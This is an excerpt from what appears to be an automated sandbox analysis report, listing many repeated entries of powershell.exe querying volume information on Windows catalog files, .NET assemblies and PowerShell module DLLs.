    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
